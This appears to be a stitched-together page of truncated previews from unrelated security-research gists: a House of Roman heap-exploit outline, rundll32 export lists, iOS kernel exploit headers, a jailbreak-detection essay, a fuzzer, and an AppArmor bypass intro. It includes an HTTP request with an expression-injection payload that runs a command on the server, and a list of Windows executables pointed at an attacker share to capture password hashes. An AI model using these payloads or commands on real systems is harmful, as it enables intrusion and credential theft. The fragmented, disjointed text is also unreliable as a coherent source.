- Disclamair
- House Of Roman
------> 2.1 Assumptions
------> 2.2 Protections
------> 2.3 Quick Walkthrough
------> 2.4 Setting the FD to malloc_hook
------> 2.5 Fixing the 0x71 freelist
------> 2.6 Unsorted Bin attack on malloc_hook
| StorageUsage.dll,GetStorageUsageInfo | |
| acmigration.dll,ApplyMigrationShims | |
| acproxy.DLL,PerformAutochkOperations | |
| ppioobe.dll,setupcalendaraccountforuser | |
| edgehtml.dll,#125 | |
| edgehtml.dll,#133 | |
| davclnt.dll,davsetcookie | |
| appxdeploymentextensions.onecore.dll,shellrefresh | |
| pla.dll,plahost | |
| aeinv.dll,updatesoftwareinventory |
| // Refrence from: https://gist.github.com/beevelop/a0f2c76e79610dca01550c9a93f83876 | |
| // Copy following scripts in the developer console of page included markdown content you want to print: | |
| (function () { | |
| var $ = document.querySelector.bind(document); | |
| $('#readme').setAttribute('style', 'position:absolute;top:0;left:0;right:0;bottom:0;z-index:100;background-color:white'); | |
| $('#readme>article').setAttribute('style', 'border: none'); | |
| $('body').innerHTML = $('#readme').outerHTML; | |
| window.print(); | |
| })(); |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <signal.h> | |
| // mach | |
| #include <mach/mach_types.h> | |
| #include <mach/mach_init.h> | |
| #include <mach/task.h> | |
| #include <mach/mach_traps.h> | |
| #include <mach/mach_interface.h> |
| #include <stdlib.h> | |
| #include <stdio.h> | |
| #include <string.h> | |
| #include <pthread.h> | |
| #include <sys/mman.h> | |
| #include <IOKit/IOKitLib.h> | |
| #include <CoreFoundation/CFPropertyList.h> | |
| const char* kMyDriversIOKitClassName = "io_oooverflow_IPwnKit"; |
| POST /users HTTP/1.1 | |
| Host: localhost:8080 | |
| Content-Type: application/x-www-form-urlencoded | |
| Content-Length: 164 | |
| username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf |
The controversy of jailbreak detection has been brought up multiple times in my Twitter feed, so in order to not have to repeat myself, I'll write my thoughts down here.
One day I'll hopefully get round to set up a realistic blog and then I'll move this there, but for now I'll just dump it here on GitHub.
Hi. I'm Siguza, and among other things I write exploits for a hobby and help make jailbreaks. One of the reasons I do that is because I believe we should have the ability to run whatever we want on our iDevices, just as we do with laptops and desktop computers. Now, a lot of app developers however seem to despise jailbreaks, and try to make their apps refuse service on jailbroken devices. I think that firstly sucks big time, and secondly always misses the point. From what I gathered, the two arguments for using jailbreak detection seem to be:
- "J
| # domato canvas generator.py replacement, put meta refresh tag at top of template.html | |
| # author: stelios | |
| from __future__ import print_function | |
| import os | |
| import re | |
| import random | |
| import sys | |
| import cherrypy | |
| import time |
This document explains how to bypass the /sbin/dhclient AppArmor profile installed in
Ubuntu by installing a kernel module. This is a simple task, but I didn't know how to
do it before today. Hopefully you find this useful.
Tested on 17.10.1 using the isc-dhcp 4.3.5-3ubuntu2.2 package.
In this advisory, Ubuntu says that the vulnerability
| Executables for Capturing Hashes (incomplete list) | |
| (all file locations are system32 - win10, impacket-smbserver with -smb2support used for testing) | |
| @0rbz_ | |
| attrib.exe \\host\share | |
| bcdboot.exe \\host\share | |
| bdeunlock.exe \\host\share | |
| cacls.exe \\host\share | |
| certreq.exe \\host\share (noisy, pops an error dialog) |